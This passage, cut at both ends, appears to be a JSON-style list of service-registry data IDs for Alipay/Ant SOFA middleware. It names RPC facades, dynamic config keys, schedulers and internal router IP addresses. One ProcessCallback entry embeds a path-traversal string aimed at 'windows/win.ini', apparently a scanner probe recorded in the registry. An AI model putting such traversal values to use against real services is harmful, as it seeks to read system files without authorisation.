client.AppInvokeService:1.0:antbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:isecuritycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:exriskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfinancial.antchain.cloud.endpoint.facade.ALiYunCloudIdeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchasset.common.service.facade.produce.AssetProduceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.bankcard.facade.ThinQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.productx.facade.RepayGuaranteeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.AcpProjectBugFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofaops.common.service.ldc.facade.ConfigServerLDCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.allocate.AllocatePhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.call.BotCallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.242.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.openhome:name=com.alipay.tutorial.msgbroker.drm.DrmDemo.open,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.158.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.kwlib:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.merchant.MrchProdLeadsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:pcmngsff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.FundC6FileDisposeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.credit.JieBeiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.preorder.PreOrderQueryMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscsalipay.common.service.facade.material.MaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecore.service.facade.RefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicetochain.common.service.facade.api.UnifiedDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:igfas.merchantpayment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanRestructureConfigDrm.activeTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.commandcenter.service.facade.api.AcpProjectGTasksFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.page.ProductUpgradeSpecialConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.MbfeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxrouter.alipayplus.common.service.facade.ChannelBatchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdrmdata.facade.PushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.gfas.gfasShareDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.audit.biz.manager.fuse.drm.FusePracticeConfigResource.userIDStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.stockFileMaxSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promox.facade.feature.FeatureAnalysisFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promodmp.service.facade.strategy.MktStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.34.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iopencore.common.service.manager.InterfaceInstanceDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.merchantdata.facade.MobilercashierErrorCodeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.confirm.FintradeConfirmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbrecruit.common.service.facade.recruit.RecruitActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.recordpool.AttackRecordPoolFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dattack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.ProductTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.SlsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.process.ProcessMngEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.o2o.facade.DepartmentTreeCacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTransOutAckCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finsign-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.report.PublicRiskmngComplainContentConsultCallBack:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillFlowControlRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inclusionconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Zone_Servers_GZ00B_mysqlcluster#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imerchprod.globalsite.facade.api.merchantcase.MerchantCaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.resource.common.facade.api.SysFunctionOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardReturnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:appxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.log.DashboardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","twa.docker.app:1.0@finsnsbff#@#DEFAULT_INSTANCE_ID#@#TWA","NS_Servers_TP_ST_CE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rccenter.common.service.facade.RcHgSurveillanceFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-25#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcloanprod.common.service.facade.service.product.PledgeProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.243.1.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.finriskcenter.common.facade.api.guardian.WorkDayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_FAULT_ISO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cap.common.service.tenant.CapTenantAccessKeyService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.echox.service.EchoxAopPlaybackService:1.0:autoinsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.micloan.agdslibra.facade.service.PersonCreditCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.logClientError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.198.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.insure.AutoUserBusinessAccessFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:apfundprod_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mif@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_TAXREFUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:appxagg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.ui.FxUiDataMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IOperationRecordRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.19.36.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.128.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:atdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.common.service.facade.RecipientCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.manage.api.LocalCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.deployorder.VerifyResultFeedbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.ZeroToleranceErrorCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cloudprovision.cloudprovision_remote_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.risk.RiskValQuestionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicCustomBannerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.tag.ItemTagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.sci.SciBenefitClassifyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@ecocheck#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.airbops:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.developerforum.service.SupportOrder:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.dut.facade.DutRecordProdTransService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_DATA-WAREHOUSE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.huoyan.mif.MifLDCTairCompareComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.ItemQueryForManageFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.ProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcommerceprod.common.service.facade.OverSeaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.onedata.dwm.client.version.DerivedIndexVersionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.DcepSwitchDRM.dcepEnvFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:findecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.market.rpc.facade.ServiceMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-meshyoptprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-test1twa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promomng_antWorkOrderProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.data.MiniAssistServiceRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finmodelops.common.service.facade.intdata.api.IntDataServiceCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkebank.common.service.alipay.contract.AgentWithholdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.pointlibrary.api.PointPurchaseManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerCrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.gateway.api.UnifyWalleCiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.displayAnalysisForOpenHome,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","_CLIENTSERVICE_TEST_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.defaultPublisherUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.155.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revtrans:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.bizrecon.CheckFileManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.solpromo.facade.api.mng.MallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mrchiscore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.batch.BatchTempQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.security.SecurityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.100.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:netflowOrderApply_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.selleradmit.AgdsccSellerExtInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundRedeemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileorderprod.service.facade.tenant.TenantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanapply.common.service.facade.service.gather.GatherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.waitersupport.facade.HistoryRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeBaseQueryFacade:1.0:tradequeryprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.ElementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_BKRDFAST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.mohelper.common.service.facade.WalletService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.98.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agmcenter.common.service.facade.v2.api.AgmTemplateComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundselling.facade.query.TransactionTicketQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.agreement.internal.operation.IRemoteAgreementOperator:1.0:remoteTwoPartyUsageAgreementModifyOperator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.face.FaceInstInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.voicesimplehandle.ReStartTaskFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.GuideserviceComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.api.CloseInvokeService:1.0:financeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.JobAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dk.common.service.facade.open.api.rule.DkDqmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulecenter.facade.common.PublishRuleService:1.0:rulecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.property.screen.MobileScreenProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:shopInfoSystemMsgSyncHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointcore:name=com.alipay.pointcore.common.service.integration.drm.resource.BudgetLibSceneCheckControlResource.pidWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scsupport.common.service.facade.internal.LocalCacheOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.writeConsistDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.28.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.7.44.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.paydecision.InstAbilityCfgManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccfpcenterbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.supergw.service.facade.transaction.ClientInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antinvoice.biz.flow.service.isvorder.IsvOrderInvoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alinp.common.service.facade.intelligent.SuspectFindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.prodmng.invest_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.peerpayprod.senior.common.service.facade.task.api.TaskExecuteFamilyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:creditmcportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.AgdsCreditPersonalAmtCapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilecashier@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:securitycap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtDbkProdWithStyCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALGOEVALUATOR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeReportPlaceholdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.NetworkAcquirerPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.InspireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.UserActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.GroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promorulecenter.common.service.facade.PromoRulePublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.configUser,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:escrowexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.tmall.QueryBillKeyFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinInterveneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.location.LocationAdminFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ANTFEATURECLOUD#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_TALLYCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defincustomer.facade.api.verify.DefincVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:insmerchantprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.irisbizprod.facade.denoise.complex.ComplexDenoiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.LogonIdSeizureQuerySevice:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAYCORECHGTYPE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.fc.arcore.abtest.abTestSourceAppWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.80.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zbdm.common.service.facade.phytable.PhyColumnService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantClassificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name